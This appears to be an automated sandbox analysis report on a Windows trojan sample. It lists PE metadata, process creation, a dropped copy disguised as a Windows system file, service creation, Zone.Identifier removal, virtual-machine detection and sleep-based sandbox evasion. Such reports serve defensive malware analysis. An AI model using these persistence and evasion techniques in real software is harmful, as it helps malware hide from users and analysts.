Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.683441978.000000000043D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTabbedViewPrj.exeJ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686067714.0000000002A10000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686303858.0000000002B10000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686303858.0000000002B10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Binary or memory string: OriginalFilenameTabbedViewPrj.exeJ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.683441978.000000000043D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTabbedViewPrj.exeJ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686067714.0000000002A10000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686303858.0000000002B10000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686303858.0000000002B10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Binary or memory string: OriginalFilenameTabbedViewPrj.exeJ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: classification engine Classification label: mal64.troj.evad.winEXE@7/0@0/2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: OpenSCManagerW,CreateServiceW,_snwprintf,CloseServiceHandle,CloseServiceHandle, 0_2_022A87A0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: OpenSCManagerW,CreateServiceW,_snwprintf,CloseServiceHandle,CloseServiceHandle, 0_2_022A87A0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B4C70 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32NextW,Process32FirstW,FindCloseChangeNotification, 2_2_023B4C70
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B4C70 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32NextW,Process32FirstW,FindCloseChangeNotification, 2_2_023B4C70
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0040C0F2 FindResourceW,LoadResource,LockResource,FreeResource, 0_2_0040C0F2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0040C0F2 FindResourceW,LoadResource,LockResource,FreeResource, 0_2_0040C0F2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5040 ChangeServiceConfig2W,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle, 0_2_022A5040
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5040 ChangeServiceConfig2W,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle, 0_2_022A5040
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe 'C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process created: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe 'C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process created: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_CURSOR
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_BITMAP
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_ICON
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_MENU
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_DIALOG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_STRING
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_ACCELERATOR
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_GROUP_ICON
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_CURSOR
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_BITMAP
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_ICON
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_MENU
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_DIALOG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_STRING
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_ACCELERATOR
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_GROUP_ICON
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\BEAUREGARD\Music\TabbedViewPrj\TabbedViewPrj\Release\TabbedViewPrj.pdb source: 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: Binary string: C:\Users\BEAUREGARD\Music\TabbedViewPrj\TabbedViewPrj\Release\TabbedViewPrj.pdb source: 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
PE file contains an invalid checksum
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: real checksum: 0xb5168 should be: 0xb56a2
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: real checksum: 0xb5168 should be: 0xb56a2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041343A push ecx; ret 0_2_0041344D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00412DD9 push ecx; ret 0_2_00412DEC
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E20 push ecx; mov dword ptr [esp], 0000EDA0h 0_2_022A5E21
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E50 push ecx; mov dword ptr [esp], 00007A5Dh 0_2_022A5E51
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E80 push ecx; mov dword ptr [esp], 0000C40Ah 0_2_022A5E81
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5EE0 push ecx; mov dword ptr [esp], 00000AC6h 0_2_022A5EE1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5F70 push ecx; mov dword ptr [esp], 0000E7B9h 0_2_022A5F71
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5F40 push ecx; mov dword ptr [esp], 0000E5DEh 0_2_022A5F41
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5FC0 push ecx; mov dword ptr [esp], 0000E566h 0_2_022A5FC1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5D30 push ecx; mov dword ptr [esp], 000012E8h 0_2_022A5D31
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5D70 push ecx; mov dword ptr [esp], 00008FD2h 0_2_022A5D71
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5DA0 push ecx; mov dword ptr [esp], 00005C85h 0_2_022A5DA1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5DD0 push ecx; mov dword ptr [esp], 0000F574h 0_2_022A5DD1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137A1E push ecx; mov dword ptr [esp], 0000C40Ah 0_2_02137A1F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137A7E push ecx; mov dword ptr [esp], 00000AC6h 0_2_02137A7F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137ADE push ecx; mov dword ptr [esp], 0000E5DEh 0_2_02137ADF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137B0E push ecx; mov dword ptr [esp], 0000E7B9h 0_2_02137B0F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137B5E push ecx; mov dword ptr [esp], 0000E566h 0_2_02137B5F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021378CE push ecx; mov dword ptr [esp], 000012E8h 0_2_021378CF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213790E push ecx; mov dword ptr [esp], 00008FD2h 0_2_0213790F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213793E push ecx; mov dword ptr [esp], 00005C85h 0_2_0213793F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213796E push ecx; mov dword ptr [esp], 0000F574h 0_2_0213796F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021379BE push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021379BF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021379EE push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021379EF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041343A push ecx; ret 0_2_0041344D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00412DD9 push ecx; ret 0_2_00412DEC
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E20 push ecx; mov dword ptr [esp], 0000EDA0h 0_2_022A5E21
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E50 push ecx; mov dword ptr [esp], 00007A5Dh 0_2_022A5E51
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5E80 push ecx; mov dword ptr [esp], 0000C40Ah 0_2_022A5E81
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5EE0 push ecx; mov dword ptr [esp], 00000AC6h 0_2_022A5EE1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5F70 push ecx; mov dword ptr [esp], 0000E7B9h 0_2_022A5F71
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5F40 push ecx; mov dword ptr [esp], 0000E5DEh 0_2_022A5F41
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5FC0 push ecx; mov dword ptr [esp], 0000E566h 0_2_022A5FC1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5D30 push ecx; mov dword ptr [esp], 000012E8h 0_2_022A5D31
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5D70 push ecx; mov dword ptr [esp], 00008FD2h 0_2_022A5D71
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5DA0 push ecx; mov dword ptr [esp], 00005C85h 0_2_022A5DA1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5DD0 push ecx; mov dword ptr [esp], 0000F574h 0_2_022A5DD1
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137A1E push ecx; mov dword ptr [esp], 0000C40Ah 0_2_02137A1F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137A7E push ecx; mov dword ptr [esp], 00000AC6h 0_2_02137A7F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137ADE push ecx; mov dword ptr [esp], 0000E5DEh 0_2_02137ADF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137B0E push ecx; mov dword ptr [esp], 0000E7B9h 0_2_02137B0F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02137B5E push ecx; mov dword ptr [esp], 0000E566h 0_2_02137B5F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021378CE push ecx; mov dword ptr [esp], 000012E8h 0_2_021378CF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213790E push ecx; mov dword ptr [esp], 00008FD2h 0_2_0213790F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213793E push ecx; mov dword ptr [esp], 00005C85h 0_2_0213793F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213796E push ecx; mov dword ptr [esp], 0000F574h 0_2_0213796F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021379BE push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021379BF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021379EE push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021379EF
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041343A push ecx; ret 2_2_0041344D
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00412DD9 push ecx; ret 2_2_00412DEC
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5E20 push ecx; mov dword ptr [esp], 0000EDA0h 2_2_023B5E21
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5E50 push ecx; mov dword ptr [esp], 00007A5Dh 2_2_023B5E51
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5E80 push ecx; mov dword ptr [esp], 0000C40Ah 2_2_023B5E81
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5EE0 push ecx; mov dword ptr [esp], 00000AC6h 2_2_023B5EE1
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B5F70 push ecx; mov dword ptr [esp], 0000E7B9h 2_2_023B5F71

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Executable created and started: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Executable created and started: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe PE file moved: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe PE file moved: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File opened: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File opened: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00403383 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00403383
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00403383 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00403383
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00403383 IsIconic,GetWindowPlacement,GetWindowRect, 2_2_00403383
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6312 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6312 Thread sleep time: -210000s >= -30000s Jump to behavior
Program does not show much activity (idle)
